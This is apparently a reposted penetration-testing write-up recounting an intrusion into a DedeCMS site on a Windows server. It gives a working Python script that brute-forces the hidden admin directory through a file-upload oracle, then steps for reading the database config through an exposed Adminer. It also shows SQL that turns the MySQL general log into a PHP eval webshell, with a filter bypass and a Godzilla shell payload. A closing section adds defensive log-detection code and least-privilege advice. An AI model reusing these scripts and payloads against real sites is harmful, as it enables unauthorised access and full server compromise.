A Chance Encounter with Adminer

Category: Security Articles

9/28




Author: Bughunter

Reposted from the Xianzhi community: https://xz.aliyun.com/t/8309


Another boring day. I fired up the high-risk vulnerability scanner and let it run, and it found nothing at all, so I started the tedious work of looking at the sites one by one. That is how I came across this site: DedeCMS on a Windows server.


I tried every historical vulnerability and none of them worked. Since the server is Windows, this script can be used to brute-force the admin backend directory:

import requests
import itertools

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
data = {
    "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]": 0,
    "_FILES[mochazz][size]": 0,
    "_FILES[mochazz][type]": "image/gif"
}

# Stage 1: find the leading characters of the backend directory name
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing", pre)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("[+] 前缀为:", back_dir)

# Stage 2: extend the known prefix one character at a time
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ", back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("后台地址为:", back_dir)


When it finished, the result was actually "dede", which made no sense: visiting /dede returned a 404.


If you do find the backend, you can also use this vulnerability to guess the administrator username:

http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/


Out of options, I casually tried adminer.php, and it actually existed. (The scanner's wordlist does include adminer.php; it probably scanned too many directories and got its IP banned, so don't trust the scanner.)


Then it was back to reading files. First I read an arbitrary file so that the error message would reveal the web root path.


Since it is DedeCMS, I went straight for data/common.inc.php.


File not found? Try reading it directly under the F: drive.


The account turned out to be root, so I logged in to adminer.php directly and got a shell through the MySQL log file.


set global general_log=on;                          -- turn on the general log
set global general_log_file='F:\*****\shell.php';   -- set the log file path
select '<?php eval($_POST['pwd']);?>';              -- write the shell

Unsurprisingly, the last statement got blocked. So I captured a request and probed the filter: select '<?php ' is not blocked.


select+'<?php+phpinfo();+?>' gets blocked.


Bypass it with a comment followed by a newline: select+'<?php+//%0Aphpinfo();+?>'


Write a Godzilla (哥斯拉) webshell:

select '<?php //"%0A$a="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";eval%01(base64_decode%01($a));//"; ?>'


Connected successfully, with SYSTEM privileges.
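Seen from the defender's side, the chain above (general_log switched on, general_log_file redirected to a .php under the web root, PHP source emitted through a SELECT) leaves a distinctive statement sequence. The following is an added example of my own, not code from the original post: it scans constructed MySQL 5.7 general-log lines for those three steps and correlates them per session, assuming the statements come from a log source the database user cannot redirect (an audit plugin, or a copy shipped off-host).

```python
import re

# MySQL 5.7 general-log line: "<timestamp>\t<thread_id> <Command>\t<argument>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
LOG_ON_RE = re.compile(r"set\s+(global\s+)?general_log\s*=\s*(on|1)\b", re.I)
LOG_FILE_RE = re.compile(r"general_log_file\s*=\s*['\"]?(?P<path>[^'\";]+)", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
# Extensions the web server would execute if the log landed under the web root
WEB_EXTS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

def classify(arg):
    """Return the alert tags that apply to one logged statement."""
    tags = []
    if LOG_ON_RE.search(arg):
        tags.append("general_log_enabled")
    m = LOG_FILE_RE.search(arg)
    if m and m.group("path").strip().lower().endswith(WEB_EXTS):
        tags.append("general_log_file_web_executable")
    if PHP_TAG_RE.search(arg):   # the opening tag survives comment/newline padding
        tags.append("php_tag_in_query")
    return tags

def scan_log(text):
    """Return (thread_id, tags) for every Query line that raised at least one tag."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m and m.group("cmd") == "Query":
            tags = classify(m.group("arg"))
            if tags:
                findings.append((m.group("tid"), tags))
    return findings

def sessions_writing_webshells(findings):
    """Thread ids that redirected the log to a web-executable file AND emitted
    PHP source: the two steps that together make the general_log webshell."""
    by_tid = {}
    for tid, tags in findings:
        by_tid.setdefault(tid, set()).update(tags)
    want = {"general_log_file_web_executable", "php_tag_in_query"}
    return sorted(t for t, tags in by_tid.items() if want <= tags)

# Constructed sample, not a real capture: session 12 replays the chain above
SAMPLE_LOG = "\n".join([
    "2020-09-28T10:15:01.000001Z\t   12 Connect\troot@203.0.113.7 on  using TCP/IP",
    "2020-09-28T10:15:02.000002Z\t   12 Query\tSELECT @@version_comment LIMIT 1",
    "2020-09-28T10:15:03.000003Z\t   12 Query\tset global general_log=on",
    "2020-09-28T10:15:04.000004Z\t   12 Query\tset global general_log_file='F:\\www\\html\\shell.php'",
    "2020-09-28T10:15:05.000005Z\t   12 Query\tselect '<?php //\"  ...padding...'",
    "2020-09-28T10:15:06.000006Z\t   13 Query\tselect name from users where id=1",
])

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for tid, tags in hits:
        print(tid, tags)
    print("webshell sessions:", sessions_writing_webshells(hits))  # ['12']
```

The root cause is the application's database account holding SUPER (or SYSTEM_VARIABLES_ADMIN), which is what lets SET GLOBAL succeed at all; a least-privilege account stops the chain before the log is ever redirected.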




Related lab

DedeCMS arbitrary password reset

https://www.hetianlab.com/expc.do?ec=ECIDe907-9309-4de6-8b4d-b941b34caa1c




